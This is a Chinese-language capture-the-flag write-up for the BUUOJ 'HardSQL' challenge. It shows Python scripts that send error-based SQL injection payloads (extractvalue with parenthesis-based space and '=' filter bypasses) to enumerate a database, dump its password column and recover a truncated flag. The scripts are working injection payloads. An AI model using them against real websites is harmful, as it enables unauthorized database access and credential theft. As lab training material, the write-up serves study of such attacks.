[极客大挑战 2019]HardSQL

本题可以用报错注入搞定
在网页端搞太累了，直接写python利用python访问就行。

import requests
url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(database()),0x7e))^'1&password=12123"
print(requests.get(url).text)

得到数据库名geek
然后经测试发现过滤了空格和=
空格无法用/**/绕过，但是可以用括号绕过。

import requests
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(database()),0x7e))^'1&password=12123"
url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),0x7e))^'1&password=12123"
print(requests.get(url).text)

得到表名H4rDsq1
然后

import requests
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(database()),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),0x7e))^'1&password=12123"
url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like'H4rDsq1'),0x7e))^'1&password=12123"
print(requests.get(url).text)

得到字段名id,username,password
最后

import requests
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(database()),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like'H4rDsq1'),0x7e))^'1&password=12123"
url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e))^'1&password=12123"
print(requests.get(url).text)

得到了flag:flag{38ea110d-4a34-447c-bf94-4d，但是flag长得有点奇怪。

可能是长度太长了只输出了前一半。
可以用substr函数绕过，也可以用right函数绕过。看了一下已经输出31位了，目测后面的应该也不足20位，就干脆输出最后的20位，重复部分去掉即可。

import requests
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(database()),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like'H4rDsq1'),0x7e))^'1&password=12123"
#url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e))^'1&password=12123"
url = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(select(group_concat(right(password,20)))from(H4rDsq1)),0x7e))^'1&password=12123"
print(requests.get(url).text)

得到c-bf94-4dbef4ce8f85}
最后：flag{38ea110d-4a34-447c-bf94-4dbef4ce8f85}